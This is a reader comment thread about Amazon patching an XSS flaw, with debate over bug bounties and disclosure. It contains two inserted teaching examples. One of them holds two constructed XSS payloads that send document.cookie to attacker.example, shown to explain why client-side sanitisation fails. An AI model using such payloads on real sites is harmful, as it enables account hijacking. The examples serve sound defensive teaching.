I helped Amazon.com find an XSS hole and all I got was this lousy t-shirt

Amazon has patched a dangerous cross-site scripting (XSS) vulnerability in its website that exposed accounts to hijacking. A Brazilian hacker using the handle @BruteLogic published the then-zero-day flaw to XSSposed.org on Saturday without tipping off the book giant. Amazon swatted the flaw two days later. The time between …

  1. Bill the Sys Admin

    They will be wishing they gave more than a t-shirt next time when somebody decides not to tell them because it's not even worth their time.

    1. Unicornpiss

      @Bill

      "They will be wishing they gave more than a t-shirt next time when somebody decides not to tell them because it's not even worth their time."

      My understanding from the article is that Amazon was not told of this flaw, but instead it was posted elsewhere on the web and subsequently brought to their attention. I suppose the next person that discovers a vulnerability could just exploit it and not tell anyone, but that happens every day anyway...

      1. big_D

        Re: @Bill

        @Unicornpiss exactly. The question is, did he approach Amazon and they told him to get lost / they don't have a bounty programme, or did he not find any mention of it and just publish it openly?

        Either way, publishing it openly is the wrong thing to do. EoS.

        1. VinceH

          Re: @Bill

          "Either way, publishing it openly is the wrong thing to do. EoS."

          Pfft.

          I accidentally discovered a flaw on Amazon's site (the UK site, but it's possible the same thing applied to other sites) some years back that could result in duplicated/forked accounts with different access details. I couldn't cause it to happen again, so it might have already been fixed (just as it might be that I couldn't work out what caused it in the first place).

          Therefore, since I wasn't aware if they had become aware of the problem and definitely fixed it - and because there may have been other people out there with similarly forked accounts (who, IMO, they should have notified if that was the case) I decided to contact them.

          Amazon - or the Amazon twit I communicated with - really, really weren't in the slightest bit interested, and even shifted the blame onto me.

    2. asdf

      or

      As big an asshat as many companies are, he is probably lucky they didn't sue him for some DMCA violation (yes, a US-only law, but when has that stopped them) for even mentioning anything about this flaw.

  2. PCS

    "His reasoning for full disclosure was that Amazon did not pay cash for bug bounty reports."

    So he did it for the money then and nothing else?

    Is altruism dead and forgotten?

    1. Anonymous Coward

      In a word: YES

      I have lost count of the number of companies - JustEat springs to mind - where I have been forced to use their sucky interface (believe me, sucky is being kind in this case - especially seeing as it replaced the infinitely superior Meal2Go), commented on such, and received an invitation to "discuss it with our development team".

      Or in other words do my job (and theirs) for free. No thanks you tight gits - you should have spent the money in the first place.

      Quick show of hands. How many El Reggers have been invited to work for free after pointing out faults and flaws in company websites?

      1. joeW

        Re: In a word: YES

        "Quick show of hands. How many El Reggers have been invited to work for free after pointing out faults and flaws in company websites?"

        I'll go you one better. After declining their offer to discuss a security issue I discovered with a site's dev guys, they threatened legal action. Basically "help us fix it for free or we'll have the cops nab you for hacking".

        I politely declined that little offer too.

      2. This post has been deleted by its author

        1. Brandon 2

          Re: In a word: YES

          It's not just in the IT industry that people are put upon to work for free... Just ask a machinist, a photographer, a singer, an accountant, etc. It's up to you as an employee to know what you're worth and have healthy boundaries and negotiating skills. Quid pro quo.

          1. Dr. Mouse

            Re: In a word: YES

            "It's not just in the IT industry that people are put upon to work for free"

            However, I do think it is more "expected" than any other, especially within (and just beyond) a circle of friends.

            I have lost count of the number of weekends I have wasted fixing a "little problem" with a friend's computer. I have also lost count of the number of shocked faces I have seen when I suggested I should be paid for the work. "But all you need to do is push a few buttons" seems to be the thought process.

            Things are different when you look at someone like a band (a mate's band charged me, albeit at mates rates, for singing at my engagement do, and I was happy to pay) or a plumber (they will generally diagnose the issue for free but charge, at mates rates again, for doing the actual work, which I am happy to pay). These are expected. They are doing "real work", not just playing with a computer.

      3. Synonymous Howard

        Re: In a word: YES

        Take a look down the list here...

        http://www.just-eat.com/jobs/

    2. paulf

      I can't help thinking Amazon has plenty of resources to find these bugs themselves if they really wanted, or even debug their code sufficiently so they're not there in the first place.

      The Altruism argument falls down because Amazon are a pretty massive company and stood to lose more from exploitation than they would have done by paying a bug bounty. If this bug is present then it's likely not the only one which shows their own debug procedures are inadequate.

      Bug bounties seem to be a pretty established MO now. Bug finder gets a tidy reward for their work to prove the bug's existence (and also to avoid them exploiting it) while $MEGACORP gets detailed information to fix the bug before someone does exploit it with all sorts of reputational damage.

      If you're really keen to debug Amazon's codebase for free in your spare time do feel free!

      1. Robert Helpmann??

        A Simple How-To

        "I can't help thinking Amazon has plenty of resources to find these bugs themselves if they really wanted, or even debug their code sufficiently so they're not there in the first place."

        You are implying that they ought to have a team that actually tests for security holes as part of the development team. Adding security to development? What is wrong with you?! Next, you will say they ought to do user acceptance testing.

    3. DNTP

      altruism

      I don't consider "doing free technical work to save someone else's CORPORATION from FINANCIAL consequences" as altruism, you know.

      Technological altruism is helping your neighbor with their dodgy connection or reporting a flaw in a medical device that could harm a PERSON. If a company wants help with their bottom line they better damn pay what it's worth.

    4. Triggerfish

      Altruism dead? It must be, after all Amazon keep charging me for stuff I want.

  3. Peter 26

    Smaller Companies - Bugs

    I come across security bugs like this all the time on smaller sites, some massive, like JavaScript sanitisation of input and nothing else! But usually I just move on as there is no benefit to me in telling them. In fact all I will get at best is hassle dealing with people who don't care, at worst a possible criminal complaint for probing their system.

    Want to make some money?

    Set up a site where people can log these issues against specific sites to act as a middle man. The site will then email the company on your behalf and offer the info at a price. The middle man obviously will take a cut.

    List on your site the websites exploits have been found for and what type they are, but obviously no details; that should get them paying!

    1. Anonymous Coward

      Re: Smaller Companies - Bugs

      Blackmail and extortion are illegal you know.

      1. Peter 26

        Re: Smaller Companies - Bugs

        I'm no lawyer, but I'm pretty sure for Blackmail or extortion it's a case of pay up or I'll do such and such to harm you. In this case it's pay up or I will do nothing except keep the information to myself.

        1. This post has been deleted by its author

          1. Peter 26

            Re: Smaller Companies - Bugs

            This is why I think a middle man is best. They can get lawyers involved and sort out all the technicalities that individuals can't do. e.g. Making sure it is made absolutely clear that this is not blackmail for starters.

    2. Anonymous Coward

      Re: Smaller Companies - Bugs

      This...so much this.

      I worked for a financial institution who had contracted for a local alarm company to install a system at a new branch. The system used an RF transmitter operating in the licensed 'business-band' frequencies, around 450 MHz. I insisted (per policy) that the company configure a secondary connection via IP or POTS. They went on and on about how secure and reliable their RF connection was and refused to install a secondary communication link. I said I can Google their frequency (and showed them the FCC ULS site) then buy a jammer off eBay that will jam their frequency and prevent any communication. This was enough to get the installer to put in a secondary connection.

      I received a call from the owner of the company the next day. He first confirmed that what I said was true, then threatened to call law enforcement and report me 'if his system so much as hiccups'. Then he hung up on me.

      We demanded he remove all of his equipment and terminated all relationships with the company.

      1. This post has been deleted by its author

    3. Robin Bradshaw

      Re: Smaller Companies - Bugs

      Peter 26 you mean like this, where the amazon xss was reported? :)

      https://www.xssposed.org/

      1. Peter 26

        Re: Smaller Companies - Bugs

        No, you get money for it. It's not public disclosure.
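Peter 26's "JavaScript sanitisation of input and nothing else" is worth making concrete, since it is exactly the class of hole the article is about. The block below is an added example, not code from the article, from XSSposed or from any commenter: a browser-side filter of the kind such a site ships, a server that trusts it, and the same server fixed by encoding on output. The payloads, the comment endpoint and the host attacker.example are constructed for the example.

```javascript
// Added example, not code from the article or from any commenter. It shows why
// client-side JavaScript sanitisation alone is no defence against XSS: the filter only
// runs for users who submit through the page, and the server below trusts it.
// The payloads and the "attacker.example" host are constructed for this example.

// The site's client-side "sanitiser": strips <script> elements and nothing else.
function clientSideSanitise(input) {
  return input.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
}

// Submission path 1: a normal user, whose browser ran the filter before posting.
function submitViaBrowser(comment) {
  return { body: clientSideSanitise(comment) };
}

// Submission path 2: an attacker posting to the same endpoint with curl or a proxy;
// the page's JavaScript never executes, so the raw value arrives unchanged.
function submitDirectly(comment) {
  return { body: comment };
}

// Vulnerable handler: assumes the client already cleaned the value and interpolates it into HTML.
function renderVulnerable(req) {
  return `<div class="comment">${req.body}</div>`;
}

// HTML-encode the five characters that can break out of a text context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: encodes on output, so what the client did or did not do no longer matters.
function renderHardened(req) {
  return `<div class="comment">${escapeHtml(req.body)}</div>`;
}

// Constructed payloads: one the filter catches, one it does not even look for.
const SCRIPT_TAG = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const EVENT_HANDLER = '<img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">';

// True if the rendered HTML contains any tag other than the wrapper <div>, i.e. injected markup.
function containsInjectedTag(html) {
  return /<(?!\/?div\b)/i.test(html);
}

// Outcome of each path; each value answers "did active markup reach the page?"
function demo() {
  return {
    browserScript: containsInjectedTag(renderVulnerable(submitViaBrowser(SCRIPT_TAG))),   // false: filter worked
    browserEvent: containsInjectedTag(renderVulnerable(submitViaBrowser(EVENT_HANDLER))), // true: filter too narrow
    directScript: containsInjectedTag(renderVulnerable(submitDirectly(SCRIPT_TAG))),      // true: filter never ran
    hardenedDirect: containsInjectedTag(renderHardened(submitDirectly(SCRIPT_TAG))),      // false
    hardenedEvent: containsInjectedTag(renderHardened(submitDirectly(EVENT_HANDLER))),    // false
  };
}
```

Run with `node` and inspect `demo()`: the browser-side filter stops only the one pattern it knows about, and stops nothing at all when the request is sent directly, while the hardened handler is safe on both paths because the fix lives where the untrusted data is rendered, not where it is typed.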

  4. JimmyPage

    Or alternatively

    Big companies lobby the government(s) to tighten up the law so that it becomes a criminal offence not to disclose bugs you find in websites to the owners. That way they don't have to spend any money on decent development and can use the threat of prison to enforce compliance.

    A little bit like it being a criminal offence (in the UK) not to notify police if Uncle Ahmed has popped off to Syria.

    Bear in mind there's *already* a delicate line to tread between asking for payment to divulge details of a bug and blackmail.

  5. Joe Harrison

    Fiver

    I explained to Tesco once that under some circumstances their website would fail to use SSL when serving the "type in your credit card number" checkout page. They sent me a five-quid voucher.

    1. JimmyPage

      Re: Fiver

      Pretty galling when you know they would happily have paid at least ten thousand times that much for the same information from a whizzy startup outfit ....

    2. This post has been deleted by its author

    3. Tcat

      Re: Fiver

      Nice. I discovered an Atlanta motel was (improperly) showing the padlock in IE on an SSL fail in payment transfer. I called to warn them and was threatened for 'hacking' (and I was booking my room while in Mexico). I replied with a fax cancellation and informed them I would be contacting the GA State Attorney's Office faster than they could call Atlanta PD.
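The Tesco and motel cases above are the same failure: a page that asks for a card number reachable over plain HTTP, or posting to it. The block below is an added example, not code from the page or from any commenter, that checks for both conditions in fetched HTML. The checkout markup and the shop.example / pay.example URLs are constructed for the example; it does no network access, so feed it the HTML and URL you fetched yourself.

```javascript
// Added example, not code from the page or from any commenter. It automates the check
// behind Joe Harrison's Tesco report: is a page that collects a card number served over
// HTTPS, and does the form it lives in submit over HTTPS? The HTML and URLs are constructed.

// Return one finding per card-entry form whose page or action is not https.
function findInsecureCardForms(pageUrl, html) {
  const page = new URL(pageUrl);
  const findings = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    // Treat a form as card entry if it has a cc-number autocomplete hint or a field named *card*.
    const collectsCard =
      /autocomplete\s*=\s*["']?cc-number/i.test(body) ||
      /\b(name|id)\s*=\s*["'][^"']*card/i.test(body);
    if (!collectsCard) continue;

    // The action resolves relative to the page; a missing action submits to the page URL itself.
    const actionMatch = /\baction\s*=\s*["']([^"']*)["']/i.exec(attrs);
    const action = new URL(actionMatch ? actionMatch[1] : "", page);

    if (page.protocol !== "https:") {
      findings.push({ action: action.href, reason: "card form served over " + page.protocol });
    } else if (action.protocol !== "https:") {
      findings.push({ action: action.href, reason: "card form submits over " + action.protocol });
    }
  }
  return findings;
}

// Constructed checkout page: a harmless search form plus the card-entry form.
const CHECKOUT_HTML = `
<form action="/search" method="get"><input name="q"></form>
<form action="/pay" method="post">
  <input name="cardnumber" autocomplete="cc-number">
  <input name="expiry" autocomplete="cc-exp">
</form>`;

// Three scenarios: the Tesco-style failure, a correct page, and a secure page posting to plain HTTP.
function demo() {
  return {
    plainPage: findInsecureCardForms("http://shop.example/checkout", CHECKOUT_HTML),
    securePage: findInsecureCardForms("https://shop.example/checkout", CHECKOUT_HTML),
    mixedAction: findInsecureCardForms("https://shop.example/checkout",
      CHECKOUT_HTML.replace('action="/pay"', 'action="http://pay.example/pay"')),
  };
}
```

The second branch matters as much as the first: a page that itself loads over HTTPS but whose form action is `http://` will still send the card number in the clear, and the browser padlock on the page gives no warning until after submission.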

  6. Anonymous Coward

    "the house always wins"

    and if it doesn't win because you have outsmarted them, they will come after you with a vengeance - just like in casinos.

  7. JDX

    Protection Racket

    "That's a nice website you have there. It would be terrible if someone publicly disclosed a security vulnerability".

  8. Anonymous Coward

    Call the waaaahmbulance

    Suck it up princess

  9. Henry Wertz 1

    Altruism isn't dead but doesn't apply here.

    "Is altruism dead and forgotten?"

    No, but when dealing with a multi-billion dollar company, I don't see the need for being altruistic. They can a) pay at least a token $100 or whatever, and b) have a security contact; I would not go through layers of tech support to report a security flaw (not saying they don't already do this, maybe they do).

    Also, here's a nasty flaw. I'm reporting it here, because Google's support interface is damn near useless, and when I reported it on their support forum the response was a) someone snarkily putting "my friend" in quotation marks, implying that it was my computer problems and not his, and b) saying I got scammed (again ignoring it was my friend -- and nobody got scammed).

    So he wanted to transfer paid Android games from his old Google account to his new one. (Why he didn't just put the old account in his new Android device I don't know.) He got all flustered and finally decided to call Google (which I didn't think would help but didn't think it could hurt either). I Googled the phone number, 1 (650) 253-0000. I Googled *that* number to make sure it was actually Google's (and not some scam paid listing or something), and it is.

    My friend dialed it -- and instead of going to Google, it went to a scammy Indian call center! They dicked around for like 20 minutes pretending to transfer account info, then wanted to bill him $120. He handed the phone to me and I was like "Is this someone at Google? If so, you already have his credit card info..." "Oh, no you've got to go to this site and..." "No, if you're Google as you claim you already have his info." I handed the phone back to him and he hung up. Don't try to scam someone out of their card info by impersonating someone that already has that info 8-).

    NOBODY in the Google forum addressed "How did Google's main phone number get redirected to someone else?", instead making snarky remarks. They have NO forum for security issues, and no email contacts whatsoever to contact someone like a professional. Given this experience I would NEVER report a flaw to Google; I would report flaws publicly (especially given the only option to reach Google is ALREADY a public forum!)
